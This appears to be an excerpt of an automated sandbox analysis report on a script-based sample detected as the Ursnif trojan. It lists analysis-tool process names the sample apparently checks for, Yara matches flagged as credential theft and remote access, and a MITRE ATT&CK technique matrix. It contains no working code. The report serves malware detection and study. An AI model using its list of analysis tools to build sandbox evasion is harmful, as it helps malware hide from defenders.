            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.193769977.000001E621927000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392303164.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392377269.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392205869.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.452588959.0000000005010000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392398236.0000000005408000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.392235150.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392264056.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392331456.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.400931156.000000000528B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392358714.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392303164.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392377269.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392205869.0000000005408000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.452588959.0000000005010000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.392398236.0000000005408000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery331Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery15SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.